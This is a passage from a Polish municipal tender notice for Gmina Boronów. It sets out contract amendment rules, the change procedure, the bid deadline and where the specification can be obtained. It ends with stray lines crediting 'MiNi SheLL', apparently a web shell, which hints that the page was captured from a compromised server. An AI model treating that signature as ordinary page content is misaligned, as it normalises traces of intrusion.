10.5.Rezygnacja z części prac:
  a/ rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim    wypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy  czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami.
  b/ zamawiający dopuszcza możliwość zmian materiałów przedstawionych w ofercie   przetargowej, pod warunkiem że zmiany te będą korzystne dla Zamawiającego.  
 Będą to przykładowo okoliczności:
      - powodujące obniżenie kosztu ponoszonego przez Zamawiającego na  eksploatację i konserwację przedmiotu umowy,
      - powodujące poprawienie parametrów technicznych,
      - wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany  
        obowiązujących przepisów.
10.6.Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. 
10.7.Nie stanowią zmiany umowy w rozumieniu art. 144 ustawy Pzp:
   a/ zmiana danych związanych z obsługą administracyjno-organizacyjną np. zmiana rachunku bankowego,
   b/zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między  stronami.
10.8.Określa się następujący tryb dokonania zmian postanowień umowy.
10.8.1.Sposób inicjowania zmian:
    a/ zamawiający wnioskuje do Wykonawcy w sprawie możliwości dokonania wskazanej zmiany,
    b/wykonawca wnioskuje do Zamawiającego w sprawie możliwości dokonania  wskazanej zmiany,
    c/ przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo Wykonawcy, protokół konieczności itp.).
    d/ protokół konieczności wymaga potwierdzenia przez projektanta i zatwierdzenia  przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.boronow.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Boronów, ul. Dolna 2, pok. nr 12 w cenie 100 Zł +VAT.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2014 godzina 10:00, miejsce: Gmina Boronów, ul. Dolna 2, 42-283 Boronów, pok. nr 11 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej
Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com